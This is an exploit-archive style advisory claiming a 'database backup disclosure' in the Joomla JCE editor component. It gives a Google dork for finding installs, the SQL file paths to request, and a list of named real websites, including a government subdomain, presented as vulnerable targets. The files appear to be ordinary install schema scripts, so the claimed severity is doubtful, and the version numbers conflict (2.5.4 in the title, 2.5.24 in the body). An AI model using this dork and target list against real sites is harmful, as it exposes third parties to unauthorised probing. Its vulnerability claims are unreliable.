Joomla JCE Components 2.5.4 Database Backup Disclosure

1. #################################################################################################
2.  
3. # Exploit Title : Joomla Content Editor Com_JCE Components 2.5.24 Database Backup Disclosure Information Vulnerability
4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
5. # Date : 30/11/2018
6. # Vendor Homepage : joomlacontenteditor.net
7. # Software Download Links : joomlacontenteditor.net/downloads/
8. + github.com/joomla/volunteers.joomla.org/tree/master/www/administrator/components/com_jce/sql
9. + gitlab.dev.playkey.net/realzkh/realzkh_legacy/tree/master/administrator/components/com_jce/sql
10. + JCE 2.6.33 => joomlacontenteditor.net/downloads/editor/core?task=callelement&format=raw&item_id=1353&element=
11. f85c494b-2b32-4109-b8c1-083cca2b7db6&method=download&args[0]=9ee3309d5768681d0360490d647c2266
12. + JCE 2.5.24 => joomlacontenteditor.net/news/jce-2524-released
13. # Tested On : Windows and Linux
14. # Category : WebApps
15. # Version Information : 2.6.33 ~ 2.5.24
16. # Google Dorks : inurl:''/index.php?option=com_jce''
17. Index of /administrator/components/com_jce/sql/
18. # Exploit Risk : Medium
19. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
20. CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
21. CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
22.  
23. #################################################################################################
24.  
25. # Admin Panel Login Path :
26.  
27. /administrator/
28.  
29. # Exploit :
30.  
31. /administrator/components/com_jce/sql/mysql.sql
32.  
33. /administrator/components/com_jce/sql/postgresql.sql
34.  
35. /administrator/components/com_jce/sql/sqlsrv.sql
36.  
37. #################################################################################################
38.  
39. # Example Vulnerable Sites =>
40.  
41. [+] volunteers.joomla.org/www/administrator/components/com_jce/sql/mysql.sql
42.  
43. [+] freightdb.kzntransport.gov.za/administrator/components/com_jce/sql/mysql.sql
44.  
45. [+] murraynebraska.com/nl/administrator/components/com_jce/sql/mysql.sql
46.  
47. [+] rkbell.ca/joomla30/administrator/components/com_jce/sql/mysql.sql
48.  
49. [+] vir.nw.ru/test/vir.nw/administrator/components/com_jce/sql/mysql.sql
50.  
51. [+] weepingwaternebraska.com/nl/administrator/components/com_jce/sql/mysql.sql
52.  
53. [+] fotozrak.mk/print/administrator/components/com_jce/sql/mysql.sql
54.  
55. [+] colegioconcepciondeparral.cl/ccparral/administrator/components/com_jce/sql/mysql.sql
56.  
57. [+] elmwoodnebraska.com/nl/administrator/components/com_jce/sql/mysql.sql
58.  
59. [+] nowagalicja.itl.pl/files/jce/administrator/components/com_jce/sql/sqlsrv.sql
60.  
61. [+] aeroglobal.org/ios/administrator/components/com_jce/sql/mysql.sql
62.  
63. #################################################################################################
64.  
65. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
66.  
67. #################################################################################################